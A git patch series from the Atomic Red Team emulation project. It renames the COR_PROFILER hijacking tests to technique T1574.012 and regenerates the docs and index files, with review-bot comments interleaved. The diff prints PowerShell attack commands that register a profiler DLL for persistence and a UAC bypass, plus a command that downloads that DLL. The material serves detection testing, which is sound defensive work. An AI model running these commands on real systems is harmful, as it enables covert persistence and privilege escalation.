T1574.012}/src/atomicNotepad/atomicNotepad.vcxproj.user (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/dllmain.cpp (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/framework.h (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/pch.cpp (100%) rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad/pch.h (100%) rename atomics/{T1546.015 => T1574.012}/src/x64/Release/atomicNotepad.dll (100%) 
diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md deleted file mode 100644 index b5705870..00000000 --- a/atomics/T1546.015/T1546.015.md +++ /dev/null @@ -1,182 +0,0 @@ -# T1546.015 - Component Object Model Hijacking -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1546.015) -
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry. - -Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.
- -## Atomic Tests - -- [Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER](#atomic-test-1---com-hijack-leveraging-user-scope-cor_profiler) - -- [Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER](#atomic-test-2---com-hijack-leveraging-system-scope-cor_profiler) - -- [Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER](#atomic-test-3---com-hijack-leveraging-registry-free-process-scope-cor_profiler) - - -
- -## Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER -Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). -The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. -Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. -If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, -the notepad process will not execute with high integrity. - -**Supported Platforms:** Windows - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll| -| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| - - -#### Attack Commands: Run with `powershell`! 
- - -```powershell -Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan -New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null -New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null -New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null -New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null -Write-Host "executing eventvwr.msc" -ForegroundColor Cyan -START MMC.EXE EVENTVWR.MSC -``` - -#### Cleanup Commands: -```powershell -Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore -Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null -Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null -Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: #{file_name} must be present -##### Check Prereq Commands: -```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" -``` - - - - -
-
- -## Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER -Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. -The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity -level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will -still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. - -**Supported Platforms:** Windows - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll| -| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) - - -```powershell -Write-Host "Creating system environment variables" -ForegroundColor Cyan -New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null -New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null -New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null -``` - -#### Cleanup Commands: -```powershell -Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null -Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null -Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: #{file_name} must be present -##### Check Prereq Commands: -```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" -``` - - - - -
-
- -## Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER -Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell. - -**Supported Platforms:** Windows - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll| -| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| - - -#### Attack Commands: Run with `powershell`! - - -```powershell -$env:COR_ENABLE_PROFILING = 1 -$env:COR_PROFILER = '#{clsid_guid}' -$env:COR_PROFILER_PATH = '#{file_name}' -POWERSHELL -c 'Start-Sleep 1' -``` - -#### Cleanup Commands: -```powershell -$env:COR_ENABLE_PROFILING = 0 -$env:COR_PROFILER = '' -$env:COR_PROFILER_PATH = '' -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: #{file_name} must be present -##### Check Prereq Commands: -```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" -``` - - - - -
diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1574.012/T1574.012.yaml
similarity index 83%
rename from atomics/T1546.015/T1546.015.yaml
rename to atomics/T1574.012/T1574.012.yaml
index 9e507c5d..eee257f7 100644
--- a/atomics/T1546.015/T1546.015.yaml
+++ b/atomics/T1574.012/T1574.012.yaml
@@ -1,21 +1,23 @@
-attack_technique: T1546.015
-display_name: 'Event Triggered Execution: Component Object Model Hijacking'
+attack_technique: T1574.012
+display_name: 'Hijack Execution Flow: COR_PROFILER'
 atomic_tests:
-- name: COM Hijack Leveraging user scope COR_PROFILER
+- name: User scope COR_PROFILER
 auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
 description: |
 Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
- The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
+ The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
 Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
 If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
 the notepad process will not execute with high integrity.
+
+ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
 supported_platforms:
 - windows
 input_arguments:
 file_name:
 description: unmanaged profiler DLL
 type: Path
- default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+ default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
 clsid_guid:
 description: custom clsid guid
 type: String
@@ -28,7 +30,7 @@ atomic_tests:
 if (Test-Path #{file_name}) {exit 0} else {exit 1}
 get_prereq_command: |
 New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
 executor:
 command: |
 Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
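Review bot: The rewritten `Invoke-WebRequest` line in `get_prereq_command` fetches `T1574.012x64.dll` from the moving `master` ref with no integrity check, so whatever sits at that path when the prereq runs is what gets written to `#{file_name}` and then handed to the CLR through `COR_PROFILER_PATH` by the executor. Pinning the URL to a commit and verifying a published digest before accepting the file closes that gap: `Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/<PINNED_COMMIT>/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"` followed by `if ((Get-FileHash "#{file_name}" -Algorithm SHA256).Hash -ne "<EXPECTED_SHA256>") { Remove-Item "#{file_name}"; exit 1 }` (both angle-bracket values are placeholders to fill from the release). The same line is rewritten in the `@@ -70,7 +74,7 @@` and `@@ -106,7 +112,7 @@` hunks of this file. The `executor` block that follows continues past the end of the hunk.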
@@ -44,20 +46,22 @@ atomic_tests:
 Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
 Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
 name: powershell
-- name: COM Hijack Leveraging System Scope COR_PROFILER
+- name: System Scope COR_PROFILER
 auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
 description: |
 Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
- The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+ The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
 level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
 still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
 supported_platforms:
 - windows
 input_arguments:
 file_name:
 description: unmanaged profiler DLL
 type: Path
- default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+ default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
 clsid_guid:
 description: custom clsid guid
 type: String
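Review bot: The added description line `The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process.` is missing the opening backtick before the file name, so the generated markdown will show a stray backtick after `T1574.012x64.dll` instead of rendering it as inline code. The matching lines rewritten in the `@@ -1,21 +1,23 @@` and `@@ -83,17 +87,19 @@` hunks have the pair, so only this one needs the backtick inserted before `T1574.012x64.dll`. While the description blocks are being touched, the context line `description: unamanged profiler DLL` in the `@@ -83,17 +87,19 @@` hunk carries a pre-existing typo for `unmanaged` that the regenerated docs will also inherit.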
@@ -70,7 +74,7 @@ atomic_tests:
 if (Test-Path #{file_name}) {exit 0} else {exit 1}
 get_prereq_command: |
 New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
 executor:
 command: |
 Write-Host "Creating system environment variables" -ForegroundColor Cyan
@@ -83,17 +87,19 @@ atomic_tests:
 Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
 name: powershell
 elevation_required: true
-- name: COM Hijack Leveraging registry-free process scope COR_PROFILER
+- name: Registry-free process scope COR_PROFILER
 auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
 description: |
- Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
+ Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
 supported_platforms:
 - windows
 input_arguments:
 file_name:
 description: unamanged profiler DLL
 type: Path
- default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+ default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
 clsid_guid:
 description: custom clsid guid
 type: String
@@ -106,7 +112,7 @@ atomic_tests:
 if (Test-Path #{file_name}) {exit 0} else {exit 1}
 get_prereq_command: |
 New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
 executor:
 command: |
 $env:COR_ENABLE_PROFILING = 1
diff --git a/atomics/T1546.015/bin/T1546.015x64.dll b/atomics/T1574.012/bin/T1574.012x64.dll
similarity index 100%
rename from atomics/T1546.015/bin/T1546.015x64.dll
rename to atomics/T1574.012/bin/T1574.012x64.dll
diff --git a/atomics/T1546.015/src/atomicNotepad.sln b/atomics/T1574.012/src/atomicNotepad.sln
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad.sln
rename to atomics/T1574.012/src/atomicNotepad.sln
diff --git a/atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj b/atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj
rename to atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj
diff --git a/atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.filters b/atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.filters
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.filters
rename to atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.filters
diff --git a/atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.user b/atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.user
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/atomicNotepad.vcxproj.user
rename to atomics/T1574.012/src/atomicNotepad/atomicNotepad.vcxproj.user
diff --git a/atomics/T1546.015/src/atomicNotepad/dllmain.cpp b/atomics/T1574.012/src/atomicNotepad/dllmain.cpp
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/dllmain.cpp
rename to atomics/T1574.012/src/atomicNotepad/dllmain.cpp
diff --git a/atomics/T1546.015/src/atomicNotepad/framework.h b/atomics/T1574.012/src/atomicNotepad/framework.h
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/framework.h
rename to atomics/T1574.012/src/atomicNotepad/framework.h
diff --git a/atomics/T1546.015/src/atomicNotepad/pch.cpp b/atomics/T1574.012/src/atomicNotepad/pch.cpp
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/pch.cpp
rename to atomics/T1574.012/src/atomicNotepad/pch.cpp
diff --git a/atomics/T1546.015/src/atomicNotepad/pch.h b/atomics/T1574.012/src/atomicNotepad/pch.h
similarity index 100%
rename from atomics/T1546.015/src/atomicNotepad/pch.h
rename to atomics/T1574.012/src/atomicNotepad/pch.h
diff --git a/atomics/T1546.015/src/x64/Release/atomicNotepad.dll b/atomics/T1574.012/src/x64/Release/atomicNotepad.dll
similarity index 100%
rename from atomics/T1546.015/src/x64/Release/atomicNotepad.dll
rename to atomics/T1574.012/src/x64/Release/atomicNotepad.dll
From d55d047117862458219dee59e2f5c97af3e93d52 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator Date: Tue, 18 Aug 2020 17:34:50 +0000 Subject: [PATCH 08/19] Generate docs from job=validate_atomics_generate_docs branch=master --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 15 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 15 +- atomics/Indexes/Indexes-Markdown/index.md | 25 +- .../Indexes/Indexes-Markdown/windows-index.md | 25 +- atomics/Indexes/Matrices/matrix.md | 8 +- atomics/Indexes/Matrices/windows-matrix.md | 10 +- atomics/Indexes/index.yaml | 629 +++++++++++------- atomics/T1574.012/T1574.012.md | 190 ++++++ 10 files changed, 627 insertions(+), 294 deletions(-) create mode 100644 atomics/T1574.012/T1574.012.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index c0445812..fe518c79 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"
techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140",
"score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"tec
hniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":10
0,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T
1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID"